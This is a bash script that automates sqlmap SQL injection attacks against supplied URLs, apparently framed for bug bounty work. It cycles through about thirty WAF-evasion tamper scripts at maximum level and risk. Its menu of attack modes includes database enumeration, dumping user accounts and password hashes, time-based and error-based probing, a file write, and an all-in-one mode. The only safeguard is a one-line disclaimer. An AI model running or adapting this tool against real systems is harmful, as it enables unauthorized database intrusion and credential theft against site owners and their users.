#!/bin/bash

# Function to display a colorful banner
display_banner () {
    figlet "SQLMAP AUTOMATION" | lolcat
    echo "NoBoDY HiDe fRoM mE!" | lolcat
    echo ""
    echo "@Deepak                                                            @binwalk" | lolcat
    echo ""
    echo "WARNING!!!" | lolcat
    echo "Nobody takes responsibility for your actions. Always seek permission." | lolcat
    echo ""
}

# Array of tamper scripts
tampers=('apostrophemask' 'apostrophenullencode' 'base64encode' 'between' 'bluecoat' 'chardoubleencode' 'charencode' 'charunicodeencode' 'concat2concatws' 'equaltolike' 'greatest' 'halfversionedmorekeywords' 'ifnull2ifisnull' 'modsecurityversioned' 'modsecurityzeroversioned' 'multiplespaces' 'nonrecursivereplacement' 'percentage' 'randomcase' 'randomcomments' 'securesphere' 'space2comment' 'space2dash' 'space2hash' 'space2morehash' 'space2mssqlblank' 'space2mysqldash' 'space2plus' 'space2randomblank' 'unionalltounion' 'unmagicquotes')

# Function to perform SQL injection attacks
perform_attack () {
    local attack_type=$1
    local options=$2
    
    for tamper in "${tampers[@]}"; do
        echo "##################################" | lolcat
        echo "$tamper" | lolcat
        echo "##################################" | lolcat
        sqlmap -m "$urls" --dbms="$dbms" --level=5 --risk=3 --threads=5 --batch $options --tamper="$tamper" --alert="Vulnerability Found"
    done
}

# Function to select the type of attack to perform
select_attack () {
    select attack in "Injection-based" "File-based" "Blind-based" "Brute-based" "Time-based" "Error-based" "Out-of-band" "Bayekar" "Database Detection"; do
        case $attack in
            "Injection-based" )
                echo "(+) Injection Attacks..." | lolcat
                perform_attack "injection" "--dbs"
                break
                ;;
            "File-based" )
                echo "(+) File Based Attacks..." | lolcat
                perform_attack "file" "--dbs"
                break
                ;;
            "Blind-based" )
                echo "(+) Blind Based Attack..." | lolcat
                perform_attack "blind" "--dbms-cred"
                break
                ;;
            "Brute-based" )
                echo "(+) Brute Based Attacks..." | lolcat
                perform_attack "brute" "--users --passwords"
                break
                ;;
            "Time-based" )
                echo "(+) Time Based Attacks..." | lolcat
                perform_attack "time" "--time-sec=5 --dbs"
                break
                ;;
            "Error-based" )
                echo "(+) Error Based Attacks..." | lolcat
                perform_attack "error" "--errors"
                break
                ;;
            "Out-of-band" )
                echo "(+) Out Of Band Attacks..." | lolcat
                perform_attack "oob" "--file-write='/tmp/data.txt'"
                break
                ;;
            "Bayekar" )
                echo "(+) All attacks on a single target..." | lolcat
                echo "WARNING! This may take up to 14 hours." | lolcat
                perform_attack "bayekar" "--dbs"
                perform_attack "bayekar" "--users --passwords"
                perform_attack "bayekar" "--time-sec=5 --dbs"
                perform_attack "bayekar" "--errors"
                perform_attack "bayekar" "--file-write='/tmp/data.txt'"
                break
                ;;
            "Database Detection" )
                echo "(+) Database Detection Start..." | lolcat
                perform_attack "database" "--banner"
                continue
                ;;
            * )
                echo "Invalid selection. Please try again." | lolcat
                continue
                ;;
        esac
    done
}

# Function to install required tools
install_tools () {
    local tool="sqlmap"
    local distro=$(grep '^ID=' /etc/os-release | awk -F= '{print $2}')

    if ! command -v $tool &> /dev/null; then
        echo "$tool is not installed." | lolcat
        if [[ "$distro" == "arch" || "$distro" == "manjaro" ]]; then
            sudo pacman -Sy --noconfirm
            sudo pacman -S --noconfirm sqlmap figlet toilet lolcat
        elif [[ "$distro" == "debian" || "$distro" == "ubuntu" ]]; then
            sudo apt update -y && sudo apt install -y sqlmap figlet toilet lolcat
        else
            echo "Unsupported distribution. Please install sqlmap, figlet, toilet, and lolcat manually."
            exit 1
        fi
    else
        echo "$tool is already installed." | lolcat
    fi
}

# Function to create necessary folders
create_folders () {
    mkdir -p bugbounty/sqlmap && cd bugbounty/sqlmap || exit
}

# Main script execution
main () {
    urls=$1
    dbms=$2
    
    create_folders
    install_tools
    display_banner
    select_attack
}

# Run the main function with provided arguments
main "$@"
